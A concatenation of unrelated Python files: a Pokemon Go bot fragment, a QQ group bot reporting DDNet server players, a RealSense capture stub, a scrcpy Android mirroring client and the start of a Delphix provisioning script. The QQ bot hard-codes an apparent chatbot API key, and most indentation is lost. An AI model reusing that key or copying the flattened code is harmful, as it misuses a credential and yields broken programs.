timestamp = [0, ] * len(cellid)
response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
position = (lat, lng, 0)
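# sort cells by distance to their first fort; cells without any forts sort last (placeholder distance of 1e6)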
map_cells.sort(
key=lambda x: distance(
lat,
lng,
x['forts'][0]['latitude'],
x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
)
return map_cells
def _setup_logging(self):
# log settings
# log format
if self.config.debug:
log_level = logging.DEBUG
logging.getLogger("requests").setLevel(logging.DEBUG)
logging.getLogger("websocket").setLevel(logging.DEBUG)
logging.getLogger("socketio").setLevel(logging.DEBUG)
logging.getLogger("engineio").setLevel(logging.DEBUG)
logging.getLogger("socketIO-client").setLevel(logging.DEBUG)
logging.getLogger("pgoapi").setLevel(logging.DEBUG)
logging.getLogger("rpc_api").setLevel(logging.DEBUG)
else:
log_level = logging.ERROR
logging.getLogger("requests").setLevel(logging.ERROR)
logging.getLogger("websocket").setLevel(logging.ERROR)
logging.getLogger("socketio").setLevel(logging.ERROR)
logging.getLogger("engineio").setLevel(logging.ERROR)
logging.getLogger("socketIO-client").setLevel(logging.ERROR)
logging.getLogger("pgoapi").setLevel(logging.ERROR)
logging.getLogger("rpc_api").setLevel(logging.ERROR)
logging.basicConfig(
level=log_level,
format='%(asctime)s [%(name)10s] [%(levelname)s] %(message)s'
)
def check_session(self, position):
# Check session expiry
if self.api._auth_provider and self.api._auth_provider._ticket_expire:
# prevent crash if return not numeric value
if not self.is_numeric(self.api._auth_provider._ticket_expire):
self.logger.info("Ticket expired value is not numeric", 'yellow')
return
remaining_time = \
self.api._auth_provider._ticket_expire / 1000 - time.time()
if remaining_time < 60:
self.event_manager.emit(
'api_error',
sender=self,
level='info',
formatted='Session stale, re-logging in.'
)
self.api = ApiWrapper(config=self.config)
self.api.set_position(*position)
self.login()
self.api.activate_signature(self.get_encryption_lib())
@staticmethod
def is_numeric(s):
try:
float(s)
return True
except ValueError:
return False
def login(self):
self.event_manager.emit(
'login_started',
sender=self,
level='info',
formatted="Login procedure started."
)
lat, lng = self.position[0:2]
self.api.set_position(lat, lng, self.alt) # or should the alt kept to zero?
while not self.api.login(
self.config.auth_service,
str(self.config.username),
str(self.config.password)):
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login error, server busy. Waiting 10 seconds to try again."
)
time.sleep(10)
with self.database as conn:
c = conn.cursor()
c.execute("SELECT COUNT(name) FROM sqlite_master WHERE type='table' AND name='login'")
result = c.fetchone()
while True:
if result[0] == 1:
conn.execute('''INSERT INTO login (timestamp, message) VALUES (?, ?)''', (time.time(), 'LOGIN_SUCCESS'))
break
else:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login table not founded, skipping log"
)
break
self.event_manager.emit(
'login_successful',
sender=self,
level='info',
formatted="Login successful."
)
def get_encryption_lib(self):
if _platform == "Windows" or _platform == "win32":
# Check if we are on 32 or 64 bit
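# (sys.maxsize > 2**32 only holds on 64-bit Python builds)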
if sys.maxsize > 2**32:
file_name = 'encrypt_64.dll'
else:
file_name = 'encrypt.dll'
else:
file_name = 'encrypt.so'
if self.config.encrypt_location == '':
path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
else:
path = self.config.encrypt_location
full_path = path + '/'+ file_name
if not os.path.isfile(full_path):
self.logger.error(file_name + " is not found! Please place it in the bot's root directory or set encrypt_location in config.")
self.logger.info('Platform: '+ _platform + ' ' + file_name + ' directory: '+ path)
sys.exit(1)
else:
self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' ' + file_name + ' directory: ' + path)
return full_path
def _setup_api(self):
# instantiate pgoapi
self.api = ApiWrapper(config=self.config)
# provide player position on the earth
self._set_starting_position()
self.login()
# chain subrequests (methods) into one RPC call
self.api.activate_signature(self.get_encryption_lib())
self.logger.info('')
# send empty map_cells and then our position
self.update_web_location()
def _print_character_info(self):
# get player profile call
# ----------------------
response_dict = self.api.get_player()
# print('Response dictionary: \n\r{}'.format(json.dumps(response_dict, indent=2)))
currency_1 = "0"
currency_2 = "0"
if response_dict:
self._player = response_dict['responses']['GET_PLAYER']['player_data']
player = self._player
else:
self.logger.info(
"The API didn't return player info, servers are unstable - "
"retrying.", 'red'
)
sleep(5)
return self._print_character_info()
# @@@ TODO: Convert this to d/m/Y H:M:S
creation_date = datetime.datetime.fromtimestamp(
player['creation_timestamp_ms'] / 1e3)
creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
pokecoins = '0'
stardust = '0'
items_inventory = inventory.items()
if 'amount' in player['currencies'][0]:
pokecoins = player['currencies'][0]['amount']
if 'amount' in player['currencies'][1]:
stardust = player['currencies'][1]['amount']
self.logger.info('')
self.logger.info('--- {username} ---'.format(**player))
self.logger.info(
'Pokemon Bag: {}/{}'.format(
inventory.Pokemons.get_space_used(),
inventory.get_pokemon_inventory_size()
)
)
self.logger.info(
'Items: {}/{}'.format(
inventory.Items.get_space_used(),
inventory.get_item_inventory_size()
)
)
self.logger.info(
'Stardust: {}'.format(stardust) +
' | Pokecoins: {}'.format(pokecoins)
)
# Items Output
self.logger.info(
'PokeBalls: ' + str(items_inventory.get(1).count) +
' | GreatBalls: ' + str(items_inventory.get(2).count) +
' | UltraBalls: ' + str(items_inventory.get(3).count) +
' | MasterBalls: ' + str(items_inventory.get(4).count))
self.logger.info(
'RazzBerries: ' + str(items_inventory.get(701).count) +
' | BlukBerries: ' + str(items_inventory.get(702).count) +
' | NanabBerries: ' + str(items_inventory.get(703).count))
self.logger.info(
'LuckyEgg: ' + str(items_inventory.get(301).count) +
' | Incubator: ' + str(items_inventory.get(902).count) +
' | TroyDisk: ' + str(items_inventory.get(501).count))
self.logger.info(
'Potion: ' + str(items_inventory.get(101).count) +
' | SuperPotion: ' + str(items_inventory.get(102).count) +
' | HyperPotion: ' + str(items_inventory.get(103).count) +
' | MaxPotion: ' + str(items_inventory.get(104).count))
self.logger.info(
'Incense: ' + str(items_inventory.get(401).count) +
' | IncenseSpicy: ' + str(items_inventory.get(402).count) +
' | IncenseCool: ' + str(items_inventory.get(403).count))
self.logger.info(
'Revive: ' + str(items_inventory.get(201).count) +
' | MaxRevive: ' + str(items_inventory.get(202).count))
self.logger.info('')
def _print_list_pokemon(self):
# get pokemon list
bag = inventory.pokemons().all()
id_list =list(set(map(lambda x: x.pokemon_id, bag)))
id_list.sort()
pokemon_list = [filter(lambda x: x.pokemon_id == y, bag) for y in id_list]
show_count = self.config.pokemon_bag_show_count
show_candies = self.config.pokemon_bag_show_candies
poke_info_displayed = self.config.pokemon_bag_pokemon_info
def get_poke_info(info, pokemon):
poke_info = {
'cp': 'CP {}'.format(pokemon.cp),
'iv_ads': 'A/D/S {}/{}/{}'.format(pokemon.iv_attack, pokemon.iv_defense, pokemon.iv_stamina),
'iv_pct': 'IV {}'.format(pokemon.iv),
'ivcp': 'IVCP {}'.format(round(pokemon.ivcp,2)),
'ncp': 'NCP {}'.format(round(pokemon.cp_percent,2)),
'level': "Level {}".format(pokemon.level),
'hp': 'HP {}/{}'.format(pokemon.hp, pokemon.hp_max),
'moveset': 'Moves: {}'.format(pokemon.moveset),
'dps': 'DPS {}'.format(round(pokemon.moveset.dps, 2))
}
if info not in poke_info:
raise ConfigException("info '{}' isn't available for displaying".format(info))
return poke_info[info]
self.logger.info('Pokemon:')
for pokes in pokemon_list:
line_p = '#{} {}'.format(pokes[0].pokemon_id, pokes[0].name)
if show_count:
line_p += '[{}]'.format(len(pokes))
if show_candies:
line_p += '[{} candies]'.format(pokes[0].candy_quantity)
line_p += ': '
poke_info = ['({})'.format(', '.join([get_poke_info(x, p) for x in poke_info_displayed])) for p in pokes]
self.logger.info(line_p + ' | '.join(poke_info))
self.logger.info('')
def use_lucky_egg(self):
return self.api.use_item_xp_boost(item_id=301)
def _set_starting_position(self):
self.event_manager.emit(
'set_start_location',
sender=self,
level='info',
formatted='Setting start location.'
)
has_position = False
if self.config.test:
# TODO: Add unit tests
return
if self.config.location:
location_str = self.config.location
location = self.get_pos_by_name(location_str.replace(" ", ""))
msg = "Location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': location_str,
'position': location
}
)
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
if self.config.location_cache:
try:
# save location flag used to pull the last known location from
# the location.json
self.event_manager.emit(
'load_cached_location',
sender=self,
level='debug',
formatted='Loading cached location...'
)
with open(os.path.join(_base_dir, 'data', 'last-location-%s.json' %
self.config.username)) as f:
location_json = json.load(f)
location = (
location_json['lat'],
location_json['lng'],
location_json['alt'],
)
# If location has been set in config, only use cache if starting position has not differed
if has_position and 'start_position' in location_json:
last_start_position = tuple(location_json.get('start_position', []))
# Start position has to have been set on a previous run to do this check
if last_start_position and last_start_position != self.start_position:
msg = 'Going to a new place, ignoring cached location.'
self.event_manager.emit(
'location_cache_ignored',
sender=self,
level='debug',
formatted=msg
)
return
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='debug',
formatted='Loaded location {current_position} from cache',
data={
'current_position': location,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
has_position = True
except Exception:
if has_position is False:
sys.exit(
"No cached Location. Please specify initial location."
)
self.event_manager.emit(
'location_cache_error',
sender=self,
level='debug',
formatted='Parsing cached location failed.'
)
def get_pos_by_name(self, location_name):
# Check if the given location is already a coordinate.
if ',' in location_name:
possible_coordinates = re.findall(
"[-]?\d{1,3}[.]\d{3,7}", location_name
)
if len(possible_coordinates) == 2:
# 2 matches, this must be a coordinate. We'll bypass the Google
# geocode so we keep the exact location.
self.logger.info(
'[x] Coordinates found in passed in location, '
'not geocoding.'
)
return float(possible_coordinates[0]), float(possible_coordinates[1]), self.alt
geolocator = GoogleV3(api_key=self.config.gmapkey)
loc = geolocator.geocode(location_name, timeout=10)
return float(loc.latitude), float(loc.longitude), float(loc.altitude)
def heartbeat(self):
# Remove forts that we can now spin again.
now = time.time()
self.fort_timeouts = {id: timeout for id, timeout
in self.fort_timeouts.iteritems()
if timeout >= now * 1000}
if now - self.last_heartbeat >= self.heartbeat_threshold:
self.last_heartbeat = now
request = self.api.create_request()
request.get_player()
request.check_awarded_badges()
request.call()
try:
self.web_update_queue.put_nowait(True) # do this outside of thread every tick
except Queue.Full:
pass
def update_web_location_worker(self):
while True:
self.web_update_queue.get()
self.update_web_location()
def display_player_info(self):
inventory_items = self.api.get_inventory()
inventory_items = inventory_items['responses']['GET_INVENTORY']['inventory_delta']['inventory_items']
player_stats = next((x["inventory_item_data"]["player_stats"]
for x in inventory_items
if x.get("inventory_item_data", {}).get("player_stats", {})),
None)
if player_stats:
nextlvlxp = (int(player_stats.get('next_level_xp', 0)) - int(player_stats.get('experience', 0)))
if 'level' in player_stats and 'experience' in player_stats:
self.logger.info(
'Level: {level}'.format(
**player_stats) +
' (Next Level: {} XP)'.format(
nextlvlxp) +
' (Total: {experience} XP)'
''.format(**player_stats))
if 'pokemons_captured' in player_stats and 'poke_stop_visits' in player_stats:
self.logger.info(
'Pokemon Captured: '
'{pokemons_captured}'.format(
**player_stats) +
' | Pokestops Visited: '
'{poke_stop_visits}'.format(
**player_stats))
def get_forts(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'type' in fort]
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_map_objects(self, lat, lng, timestamp, cellid):
if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
return self.last_map_object
self.last_map_object = self.api.get_map_objects(
latitude=f2i(lat),
longitude=f2i(lng),
since_timestamp_ms=timestamp,
cell_id=cellid
)
self.last_time_map_object = time.time()
return self.last_map_object
def _load_recent_forts(self):
if not self.config.forts_cache_recent_forts:
return
cached_forts_path = os.path.join(_base_dir, 'data', 'recent-forts-%s.json' % self.config.username)
try:
# load the cached recent forts
with open(cached_forts_path) as f:
cached_recent_forts = json.load(f)
num_cached_recent_forts = len(cached_recent_forts)
num_recent_forts = len(self.recent_forts)
# Handles changes in max_circle_size
if not num_recent_forts:
self.recent_forts = []
elif num_recent_forts > num_cached_recent_forts:
self.recent_forts[-num_cached_recent_forts:] = cached_recent_forts
elif num_recent_forts < num_cached_recent_forts:
self.recent_forts = cached_recent_forts[-num_recent_forts:]
else:
self.recent_forts = cached_recent_forts
self.event_manager.emit(
'loaded_cached_forts',
sender=self,
level='debug',
formatted='Loaded cached forts...'
)
except IOError:
self.event_manager.emit(
'no_cached_forts',
sender=self,
level='debug',
formatted='Starting new cached forts for {path}',
data={'path': cached_forts_path}
)
|
ddnetQQbot.py
|
from qqbot import _bot as bot
import time
import csv
import requests
import json
import threading
#from multiprocessing import Process, Lock
from getServerInfo import Server_Info
servers_CHNTom = [[('119.29.57.22', 8304), 0],
[('119.29.57.22', 8403), 0],
[('119.29.57.22', 7321), 0],
[('119.29.57.22', 7304), 0],
[('119.29.57.22', 7317), 0],
[('119.29.57.22', 8303), 0],
[('119.29.57.22', 8203), 0],
[('119.29.57.22', 8406), 0],
[('119.29.57.22', 8409), 0],
[('119.29.57.22', 8200), 0],
[('119.29.57.22', 7303), 0],
[('119.29.57.22', 8404), 0],
[('119.29.57.22', 8410), 0],
[('119.29.57.22', 8201), 0],
[('119.29.57.22', 8408), 0],
[('119.29.57.22', 8202), 0],
[('119.29.57.22', 7306), 0],
[('119.29.57.22', 7400), 0],
[('119.29.57.22', 8407), 0],
[('119.29.57.22', 7401), 0],
[('119.29.57.22', 8305), 0],
[('119.29.57.22', 8402), 0],
[('119.29.57.22', 7305), 0],
[('119.29.106.160', 8303), 0],
[('202.118.17.142', 8121), 0],
[('103.88.47.135', 8121), 0],
[('114.220.10.9', 8303), 0],
[('118.126.91.236', 8304), 0],
[('118.126.91.236', 8305), 0],
[('47.98.59.11', 8303), 0],
[('47.74.9.32', 8303), 0],
[('118.126.91.236', 8303), 0],
[('118.126.91.236', 8302), 0],
[('118.126.91.236', 8301), 0],
[('106.14.5.168', 8304), 0],
[('106.14.5.168', 7988), 0],
[('45.32.41.155', 8303), 0],
[('47.74.32.152', 8121), 0],
[('202.141.160.95', 40125), 0],
[('202.141.160.95', 40028), 0],
[('202.141.160.95', 40126), 0],
[('202.141.160.95', 40128), 0],
[('35.197.129.14', 8303), 0]]
#fetch the players list from the CHN Tom servers in another thread every 30s
players_list = []
last_players_list = []
lock = threading.Lock()
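# guards updates to players_list, which is rewritten by the server-info thread every 30s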
#lock = Lock()
def get_servers_info():
global players_list
while True:
servers_info = []
#print(str(len(servers_CHNTom)) + " servers")
for server in servers_CHNTom:
#[('47.74.9.32', 8303), 0]
s = Server_Info(server[0], server[1])
servers_info.append(s)
s.start()
time.sleep(0.001) # avoid issues
num_players = 0
num_clients = 0
servers_info_list = []
while len(servers_info) != 0:
if servers_info[0].finished == True:
if servers_info[0].info:
servers_info_list.append(servers_info[0].info)
num_players += servers_info[0].info["num_players"]
if servers_info[0].type == 0:
num_clients += servers_info[0].info["num_clients"]
else:
num_clients += servers_info[0].info["num_players"]
del servers_info[0]
time.sleep(0.001) # be nice
#print(str(num_players) + " players and " + str(num_clients-num_players) + " spectators")
player_list_temp = []
for servers_info in servers_info_list:
if servers_info['players']:
for player_info in servers_info['players']:
player_list_temp.append(player_info['name'].decode())
lock.acquire()
try:
players_list = player_list_temp
print("get data successfully")
#print(players_list)
finally:
lock.release()
pass
time.sleep(30)
def sendMessageOnline():
while True:
time.sleep(2)
#print (friendDict)
#print (players_list)
for qqNickName in friendDict:
for friend in friendDict[qqNickName]:
if friend[0] in players_list:
if friend[1] == 0:
last_players_list = players_list
myQQId = bot.List('buddy', qqNickName)[0]
#print(myQQId)
bot.SendTo(myQQId, "你的好友{}上线了。".format(friend[0]))
friend[1] = 1
else:
pass
else:
if friend[1] == 1:
bot.SendTo(myQQId, "你的好友{}下线了。".format(friend[0]))
friend[1] = 0
def sendMessageReply():
while True:
time.sleep(2)
# bot.poll() blocks here until the next message arrives
fromType, groupNumber, fromNumber, content = bot.poll()
print (fromType, groupNumber, fromNumber, content)
keywordInContent = False
if groupNumber == mainGroup.uin:
sendtoGroup = mainGroup
print("来自主群的消息")
isChatGroup = False
elif groupNumber == chatGroup.uin:
sendtoGroup = chatGroup
print("来自闲聊群的消息")
isChatGroup = True
#change the "@brainfullyTEE" mention below to your own bot's ID
if "大家好" in content:
bot.SendTo(sendtoGroup, "欢迎新人~如果有什么游戏相关的问题可以带上问号“?”并且@我向我提问~")
if "help" in content:
bot.SendTo(sendtoGroup, "如果有什么游戏相关的问题,可以用包含关键词和问号“?”的句子并且@我向我提问~项目地址:https://github.com/QingGo/ddnetQQbot")
if "@brainfullyTEE" in content:
print ("@我的消息")
if "player" in content:
if len(players_list) == 0:
sendStr = "目前没人在线."
else:
sendStr = ("目前在线玩家数为{},分别为:".format(len(players_list))) + (", ".join(players_list))
bot.SendTo(sendtoGroup, sendStr)
elif "?" in content or "?" in content:
for keyword in replyDict:
if keyword.lower() in content.lower():
bot.SendTo(sendtoGroup, replyDict[keyword])
keywordInContent = True
if not keywordInContent:
bot.SendTo(sendtoGroup, "不好意思,你所说的关键词尚未收录。快去https://github.com/QingGo/ddnetQQbot 贡献词库吧。如果要进行普通对话请不要带问号。")
else:
if isChatGroup:
requestJson["info"] = content.replace("@brainfullyTEE ","")
requestJson["userid"] = fromNumber
respone = requests.post(chatAPI, requestJson)
responeContent = json.loads(respone.text)
bot.SendTo(sendtoGroup, responeContent["text"]+responeContent.get("url", ""))
else:
bot.SendTo(sendtoGroup, "询问关键词的话请加上问号")
#the -u flag logs in using the given user's qqbot profile
#you may need to edit qqbot's config file ~/.qqbot-tmp/v2.3.conf first
#see the qqbot project's documentation for details
print("test get server info")
print(last_players_list)
bot.Login(['-u', '2143738142'])
#change these to your own group names
mainGroup = bot.List('group', 'TeeWorlds中国社区')[0] #2960233702
print("mainGroup.uin: ", mainGroup.uin)
chatGroup = bot.List('group', 'Teeworlds闲聊群')[0] #1516349281
print("chatGroup.uin: ",chatGroup.uin)
isChatGroup = False
# Load the auto-reply dictionary
replyFile = "autoReply.txt"
replyDict = {}
with open(replyFile, 'r') as f:
spamreader = csv.reader(f, delimiter=',')
for row in spamreader:
if not row:
continue
if row[0].startswith('#'):
print(row)
else:
replyDict[row[0]] = row[1]
# Load the friend list
friendFile = "friendList.txt"
friendDict = {}
with open(friendFile, 'r') as f:
spamreader = csv.reader(f, delimiter=',')
for row in spamreader:
if not row:
continue
if row[0].startswith('#'):
print(row)
else:
            friendDict[row[0]] = list(map(list, zip(row[1:], [0] * len(row[1:]))))
# API of the Tuling chatbot platform
chatAPI = "http://www.tuling123.com/openapi/api"
requestJson = {"key": "692b5c941e7a43e2be89b1047b605049","info": "", "userid":""}
print(bot.List('buddy'))
# Poll for messages indefinitely and respond accordingly
'''
info_process = Process(target=get_servers_info)
send_message_online = Process(target=sendMessageOnline)
send_message_reply = Process(target=sendMessageReply)
'''
info_process = threading.Thread(target=get_servers_info)
send_message_online = threading.Thread(target=sendMessageOnline)
send_message_reply = threading.Thread(target=sendMessageReply)
info_process.start()
send_message_online.start()
send_message_reply.start()
|
PersonTracking.py
|
#Algorithm to use RealSense D435 to extract person from background
from threading import Thread
import pyrealsense2 as rs
import numpy as np
import cv2
import time
import Queue
#Define class to store image data
class realsense_image(object):
def __init__(self, depth_image, color_image):
self.depth = depth_image
self.color = color_image
#start __main__
# Configure depth and color streams
pipeline = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 15)
config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 15)
# Start streaming
profile = pipeline.start(config)
# Getting the depth sensor's depth scale (see rs-align example for explanation)
depth_sensor = profile.get_device().first_depth_sensor()
depth_scale = depth_sensor.get_depth_scale()
print("Depth Scale is: " , depth_scale)
# Create an align object
# rs.align allows us to perform alignment of depth frames to others frames
# The "align_to" is the stream type to which we plan to align depth frames.
align_to = rs.stream.color
align = rs.align(align_to)
#Set up a frame buffer queue with a maximum size of 2
q = Queue.Queue(2)
#Flag controlling the capture loop; the capture thread itself is created and
#started below, after RealSenseCapture has been defined (see end of file).
iscapture = True
#---------------------------------------------------------------------------------------
#end __main__
def ProcessDepthGrayscale(iscapture):
try:
#Read image data from queue
data = q.get()
finally:
pass
def RealSenseCapture(iscapture):
try:
while iscapture:
# Wait for a coherent pair of frames: depth and color
frames = pipeline.wait_for_frames()
# Align the depth frame to color frame
aligned_frames = align.process(frames)
# Get aligned frames
depth_frame = aligned_frames.get_depth_frame().as_depth_frame() # aligned_depth_frame is a 640x480 depth image
color_frame = aligned_frames.get_color_frame()
if not depth_frame or not color_frame:
continue
            # Convert images to numpy arrays
            depth_image = np.asanyarray(depth_frame.get_data())
            color_image = np.asanyarray(color_frame.get_data())
            # Bundle both images so they travel through the queue together
            data = realsense_image(depth_image, color_image)
            if not q.full():
                #Put image data to queue, when slot is empty
                q.put(data)
            else:
                #Take previous data out
                discard_data = q.get_nowait()
                #Put new data into queue
                q.put(data)
finally:
# Stop streaming
pipeline.stop()
print("RealSense capture closed...")
|
core.py
|
import os
import socket
import struct
import threading
import time
from io import BufferedIOBase, BytesIO
from time import sleep
from typing import Any, Callable, Optional, Tuple, Union
import av
import cv2
import numpy as np
from adbutils import AdbDevice, AdbError, Network, _AdbStreamConnection, adb
from av.codec import CodecContext
from .const import EVENT_FRAME, EVENT_INIT, LOCK_SCREEN_ORIENTATION_UNLOCKED
from .control import ControlSender
class Client:
def __init__(
self,
        device: Optional[Union[AdbDevice, str, Any]] = None,
max_width: int = 0,
bitrate: int = 8000000,
max_fps: int = 0,
flip: bool = False,
block_frame: bool = False,
stay_awake: bool = False,
lock_screen_orientation: int = LOCK_SCREEN_ORIENTATION_UNLOCKED,
connection_timeout: int = 3000,
):
"""
        Create a scrcpy client. The client is not started until you call the start function.
Args:
device: Android device, select first one if none, from serial if str
max_width: frame width that will be broadcast from android server
bitrate: bitrate
max_fps: maximum fps, 0 means not limited (supported after android 10)
flip: flip the video
block_frame: only return nonempty frames, may block cv2 render thread
stay_awake: keep Android device awake
lock_screen_orientation: lock screen orientation, LOCK_SCREEN_ORIENTATION_*
connection_timeout: timeout for connection, unit is ms
"""
if device is None:
device = adb.device_list()[0]
elif isinstance(device, str):
device = adb.device(serial=device)
self.device = device
self.listeners = dict(frame=[], init=[])
# User accessible
self.last_frame: Optional[np.ndarray] = None
self.resolution: Optional[Tuple[int, int]] = None
self.device_name: Optional[str] = None
self.control = ControlSender(self)
# Params
self.flip = flip
self.max_width = max_width
self.bitrate = bitrate
self.max_fps = max_fps
self.block_frame = block_frame
self.stay_awake = stay_awake
self.lock_screen_orientation = lock_screen_orientation
self.connection_timeout = connection_timeout
# Need to destroy
self.alive = False
self.__server_stream: Optional[_AdbStreamConnection] = None
self.__video_socket: Optional[socket.socket] = None
self.control_socket: Optional[socket.socket] = None
self.control_socket_lock = threading.Lock()
def __init_server_connection(self) -> None:
"""
        Connect to the android server. Two sockets are created: a video socket and a control socket.
This method will set: video_socket, control_socket, resolution variables
"""
for _ in range(self.connection_timeout // 100):
try:
self.__video_socket = self.device.create_connection(
Network.LOCAL_ABSTRACT, "scrcpy"
)
break
except AdbError:
sleep(0.1)
pass
else:
raise ConnectionError("Failed to connect scrcpy-server after 3 seconds")
dummy_byte = self.__video_socket.recv(1)
if not len(dummy_byte) or dummy_byte != b"\x00":
raise ConnectionError("Did not receive Dummy Byte!")
self.control_socket = self.device.create_connection(
Network.LOCAL_ABSTRACT, "scrcpy"
)
self.device_name = self.__video_socket.recv(64).decode("utf-8").rstrip("\x00")
if not len(self.device_name):
raise ConnectionError("Did not receive Device Name!")
res = self.__video_socket.recv(4)
self.resolution = struct.unpack(">HH", res)
self.__video_socket.setblocking(False)
def __deploy_server(self) -> None:
"""
Deploy server to android device
"""
server_root = os.path.abspath(os.path.dirname(__file__))
server_file_path = server_root + "/scrcpy-server.jar"
self.device.push(server_file_path, "/data/local/tmp/")
self.__server_stream: _AdbStreamConnection = self.device.shell(
[
"CLASSPATH=/data/local/tmp/scrcpy-server.jar",
"app_process",
"/",
"com.genymobile.scrcpy.Server",
"1.20", # Scrcpy server version
"info", # Log level: info, verbose...
f"{self.max_width}", # Max screen width (long side)
f"{self.bitrate}", # Bitrate of video
f"{self.max_fps}", # Max frame per second
f"{self.lock_screen_orientation}", # Lock screen orientation: LOCK_SCREEN_ORIENTATION
"true", # Tunnel forward
"-", # Crop screen
"false", # Send frame rate to client
"true", # Control enabled
"0", # Display id
"false", # Show touches
"true" if self.stay_awake else "false", # Stay awake
"-", # Codec (video encoding) options
"-", # Encoder name
"false", # Power off screen after server closed
],
stream=True,
)
# Wait for server to start
self.__server_stream.read(10)
def start(self, threaded: bool = False) -> None:
"""
Start listening video stream
Args:
threaded: Run stream loop in a different thread to avoid blocking
"""
assert self.alive is False
self.__deploy_server()
self.__init_server_connection()
self.alive = True
self.__send_to_listeners(EVENT_INIT)
if threaded:
threading.Thread(target=self.__stream_loop).start()
else:
self.__stream_loop()
def stop(self) -> None:
"""
Stop listening (both threaded and blocked)
"""
self.alive = False
if self.__server_stream is not None:
self.__server_stream.close()
if self.control_socket is not None:
self.control_socket.close()
if self.__video_socket is not None:
self.__video_socket.close()
def __stream_loop(self) -> None:
"""
Core loop for video parsing
"""
codec = CodecContext.create("h264", "r")
while self.alive:
try:
raw_h264 = self.__video_socket.recv(0x10000)
packets = codec.parse(raw_h264)
for packet in packets:
frames = codec.decode(packet)
for frame in frames:
frame = frame.to_ndarray(format="bgr24")
if self.flip:
frame = cv2.flip(frame, 1)
self.last_frame = frame
self.resolution = (frame.shape[1], frame.shape[0])
self.__send_to_listeners(EVENT_FRAME, frame)
except BlockingIOError:
time.sleep(0.01)
if not self.block_frame:
self.__send_to_listeners(EVENT_FRAME, None)
except OSError as e: # Socket Closed
if self.alive:
raise e
def add_listener(self, cls: str, listener: Callable[..., Any]) -> None:
"""
Add a video listener
Args:
cls: Listener category, support: init, frame
listener: A function to receive frame np.ndarray
"""
self.listeners[cls].append(listener)
def remove_listener(self, cls: str, listener: Callable[..., Any]) -> None:
"""
Remove a video listener
Args:
cls: Listener category, support: init, frame
listener: A function to receive frame np.ndarray
"""
self.listeners[cls].remove(listener)
def __send_to_listeners(self, cls: str, *args, **kwargs) -> None:
"""
Send event to listeners
Args:
cls: Listener type
*args: Other arguments
            **kwargs: Other keyword arguments
"""
for fun in self.listeners[cls]:
fun(*args, **kwargs)
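# --- Usage sketch (not part of the original module) --------------------------
# A minimal, hedged example of how this Client might be driven, assuming an
# adb-connected Android device, the bundled scrcpy-server.jar next to this
# file, and that the module is run inside its package (it uses relative
# imports), e.g. `python -m <package>.core`.
if __name__ == "__main__":
    client = Client(max_width=1280, bitrate=4000000)
    def on_frame(frame: Optional[np.ndarray]) -> None:
        # frame is a BGR ndarray; it can be None when block_frame is False and
        # no new frame has been decoded since the last callback.
        if frame is not None:
            cv2.imshow("device", frame)
            cv2.waitKey(1)
    client.add_listener(EVENT_FRAME, on_frame)
    try:
        client.start(threaded=False)  # blocks until stop() is called
    except KeyboardInterrupt:
        client.stop()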
|
dx_provision_vdb.py
|
#!/usr/bin/env python
# Adam Bowen - Apr 2016
# This script provisions a vdb or dSource
# Updated by Corey Brune Aug 2016
# --- Create vFiles VDB
# requirements
# pip install docopt delphixpy
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script.
# TODO:
# Refactor provisioning functions
# Documentation
"""Provision VDB's
Usage:
  dx_provision_vdb.py --source <name> --target_grp <name> --target <name>
(--db <name> | --vfiles_path <path>) [--no_truncate_log]
(--environment <name> --type <type>) [ --envinst <name>]
[--template <name>] [--mapfile <file>]
[--timestamp_type <type>] [--timestamp <timepoint_semantic>]
[--timeflow <name>]
[--instname <sid>] [--mntpoint <path>] [--noopen]
[--uniqname <name>][--source_grp <name>]
[--engine <identifier> | --all]
[--vdb_restart <bool> ]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
[--postrefresh <name>] [--prerefresh <name>]
[--configure-clone <name>]
[--prerollback <name>] [--postrollback <name>]
  dx_provision_vdb.py -h | --help | -v | --version
Provision VDB from a defined source on the defined target environment.
Examples:
dx_provision_vdb.py --engine landsharkengine --source_grp Sources --source "ASE pubs3 DB" --db vase --target testASE --target_grp Analytics --environment LINUXTARGET --type ase --envinst "LINUXTARGET"
dx_provision_vdb.py --source_grp Sources --source "Employee Oracle 11G DB" --instname autod --uniqname autoprod --db autoprod --target autoprod --target_grp Analytics --environment LINUXTARGET --type oracle --envinst "/u01/app/oracle/product/11.2.0/dbhome_1"
dx_provision_vdb.py --source_grp Sources --source "AdventureWorksLT2008R2" --db vAW --target testAW --target_grp Analytics --environment WINDOWSTARGET --type mssql --envinst MSSQLSERVER --all
dx_provision_vdb.py --source UF_Source --target appDataVDB --target_grp Untitled --environment LinuxTarget --type vfiles --vfiles_path /mnt/provision/appDataVDB --prerollback "/u01/app/oracle/product/scripts/PreRollback.sh" --postrollback "/u01/app/oracle/product/scripts/PostRollback.sh" --vdb_restart true
Options:
--source_grp <name> The group where the source resides.
--source <name> Name of the source object
--target_grp <name> The group into which Delphix will place the VDB.
--target <name> The unique name that you want to call this object
in Delphix
--db <name> The name you want to give the database (Oracle Only)
--vfiles_path <path> The full path on the Target server where Delphix
will provision the vFiles
